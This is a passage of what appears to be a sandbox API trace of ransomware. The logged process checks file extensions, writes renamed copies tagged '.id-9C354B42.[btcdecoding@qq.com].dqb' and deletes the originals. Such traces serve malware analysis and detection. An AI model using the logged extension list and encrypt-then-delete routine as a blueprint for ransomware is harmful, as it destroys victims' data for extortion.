1 [0048.409] lstrlenW (lpString=".rar") returned 4 [0048.409] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString=".bz2") returned 4 [0048.409] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString=".7z") returned 3 [0048.409] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0048.409] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.409] lstrlenW (lpString=".dbf") returned 4 [0048.409] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.409] lstrlenW (lpString=".1cd") returned 4 [0048.409] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0048.409] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 70 [0048.409] lstrlenW (lpString=".jpg") returned 4 [0048.409] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0049.027] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=34076) returned 1 [0049.028] CloseHandle (hObject=0x228) returned 1 [0049.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20 [0049.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0049.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0049.028] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.028] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0049.028] GetLastError () returned 0x0 [0049.028] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x851c, lpOverlapped=0x0) returned 1 [0049.030] WriteFile (in: hFile=0x224, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x8520, lpOverlapped=0x0) returned 1 [0049.031] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.031] WriteFile (in: hFile=0x224, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.031] SetEndOfFile (hFile=0x224) returned 1 [0049.032] CloseHandle (hObject=0x224) returned 1 [0049.032] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.032] SetEndOfFile (hFile=0x228) returned 1 [0049.033] CloseHandle (hObject=0x228) returned 1 [0049.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.033] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1 [0049.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.033] lstrlenW (lpString=".doc") returned 4 [0049.033] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0049.033] lstrlenW (lpString=".docx") returned 5 [0049.033] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0049.033] lstrlenW (lpString=".pdf") returned 4 [0049.033] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0049.033] lstrlenW (lpString=".xls") returned 4 [0049.033] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0049.033] lstrlenW (lpString=".xlsx") returned 5 [0049.033] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0049.033] lstrlenW (lpString=".ppt") returned 4 [0049.033] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0049.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.034] lstrlenW (lpString=".zip") returned 4 [0049.034] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0049.034] lstrlenW (lpString=".rar") returned 4 [0049.034] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0049.034] lstrlenW (lpString=".bz2") returned 4 [0049.034] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0049.034] lstrlenW (lpString=".7z") returned 3 [0049.034] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0049.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.034] lstrlenW (lpString=".dbf") returned 4 [0049.034] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0049.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.034] lstrlenW (lpString=".1cd") returned 4 [0049.034] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0049.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0049.034] lstrlenW (lpString=".jpg") returned 4 [0049.034] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.526] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.532] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.536] GetLastError () returned 0x0 [0050.536] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xcb3, lpOverlapped=0x0) returned 1 [0050.543] WriteFile (in: hFile=0x178, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0050.544] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.544] WriteFile (in: hFile=0x178, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.544] SetEndOfFile (hFile=0x178) returned 1 [0050.544] CloseHandle (hObject=0x178) returned 1 [0050.544] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.544] SetEndOfFile (hFile=0x228) returned 1 [0050.545] CloseHandle (hObject=0x228) returned 1 [0050.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0050.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.545] lstrlenW (lpString=".doc") returned 4 [0050.545] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.545] lstrlenW (lpString=".docx") returned 5 [0050.545] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.545] lstrlenW (lpString=".pdf") returned 4 [0050.545] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.546] lstrlenW (lpString=".xls") returned 4 [0050.546] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.546] lstrlenW (lpString=".xlsx") returned 5 [0050.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.546] lstrlenW (lpString=".ppt") returned 4 [0050.546] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.546] lstrlenW (lpString=".zip") returned 4 [0050.546] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.546] lstrlenW (lpString=".rar") returned 4 [0050.546] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.546] lstrlenW (lpString=".bz2") returned 4 [0050.546] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.546] lstrlenW (lpString=".7z") returned 3 [0050.546] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.546] lstrlenW (lpString=".dbf") returned 4 [0050.546] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.546] lstrlenW (lpString=".1cd") returned 4 [0050.546] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0050.546] lstrlenW (lpString=".jpg") returned 4 [0050.546] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.548] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.548] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.549] GetLastError () returned 0x0 [0050.549] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x296f, lpOverlapped=0x0) returned 1 [0050.551] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x2970, lpOverlapped=0x0) returned 1 [0050.552] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.552] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.552] SetEndOfFile (hFile=0x228) returned 1 [0050.552] CloseHandle (hObject=0x228) returned 1 [0050.552] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.552] SetEndOfFile (hFile=0x1dc) returned 1 [0050.553] CloseHandle (hObject=0x1dc) returned 1 [0050.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString=".doc") returned 4 [0050.554] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.554] lstrlenW (lpString=".docx") returned 5 [0050.554] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.554] lstrlenW (lpString=".pdf") returned 4 [0050.554] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.554] lstrlenW (lpString=".xls") returned 4 [0050.554] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.554] lstrlenW (lpString=".xlsx") returned 5 [0050.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.554] lstrlenW (lpString=".ppt") returned 4 [0050.554] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString=".zip") returned 4 [0050.554] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.554] lstrlenW (lpString=".rar") returned 4 [0050.554] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.554] lstrlenW (lpString=".bz2") returned 4 [0050.554] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.554] lstrlenW (lpString=".7z") returned 3 [0050.554] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString=".dbf") returned 4 [0050.554] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString=".1cd") returned 4 [0050.554] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0050.554] lstrlenW (lpString=".jpg") returned 4 [0050.555] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.555] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.555] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.555] GetLastError () returned 0x0 [0050.555] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x3bcc, lpOverlapped=0x0) returned 1 [0050.558] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x3bd0, lpOverlapped=0x0) returned 1 [0050.559] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.559] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.559] SetEndOfFile (hFile=0x228) returned 1 [0050.559] CloseHandle (hObject=0x228) returned 1 [0050.559] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.559] SetEndOfFile (hFile=0x1dc) returned 1 [0050.560] CloseHandle (hObject=0x1dc) returned 1 [0050.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.560] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0050.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.560] lstrlenW (lpString=".doc") returned 4 [0050.560] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.561] lstrlenW (lpString=".docx") returned 5 [0050.561] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.561] lstrlenW (lpString=".pdf") returned 4 [0050.561] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.561] lstrlenW (lpString=".xls") returned 4 [0050.561] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.561] lstrlenW (lpString=".xlsx") returned 5 [0050.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.561] lstrlenW (lpString=".ppt") returned 4 [0050.561] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.561] lstrlenW (lpString=".zip") returned 4 [0050.561] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.561] lstrlenW (lpString=".rar") returned 4 [0050.561] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.561] lstrlenW (lpString=".bz2") returned 4 [0050.561] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.561] lstrlenW (lpString=".7z") returned 3 [0050.561] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.561] lstrlenW (lpString=".dbf") returned 4 [0050.561] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.561] lstrlenW (lpString=".1cd") returned 4 [0050.561] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0050.561] lstrlenW (lpString=".jpg") returned 4 [0050.561] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.562] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.562] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.562] GetLastError () returned 0x0 [0050.562] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x14c3, lpOverlapped=0x0) returned 1 [0050.565] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0050.566] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.566] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.566] SetEndOfFile (hFile=0x228) returned 1 [0050.566] CloseHandle (hObject=0x228) returned 1 [0050.566] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.566] SetEndOfFile (hFile=0x1dc) returned 1 [0050.567] CloseHandle (hObject=0x1dc) returned 1 [0050.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0050.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.568] lstrlenW (lpString=".doc") returned 4 [0050.568] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.568] lstrlenW (lpString=".docx") returned 5 [0050.568] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.568] lstrlenW (lpString=".pdf") returned 4 [0050.568] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.568] lstrlenW (lpString=".xls") returned 4 [0050.568] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.568] lstrlenW (lpString=".xlsx") returned 5 [0050.568] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.568] lstrlenW (lpString=".ppt") returned 4 [0050.568] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.568] lstrlenW (lpString=".zip") returned 4 [0050.568] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.568] lstrlenW (lpString=".rar") returned 4 [0050.568] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.568] lstrlenW (lpString=".bz2") returned 4 [0050.569] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.569] lstrlenW (lpString=".7z") returned 3 [0050.569] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.569] lstrlenW (lpString=".dbf") returned 4 [0050.569] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.569] lstrlenW (lpString=".1cd") returned 4 [0050.569] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0050.569] lstrlenW 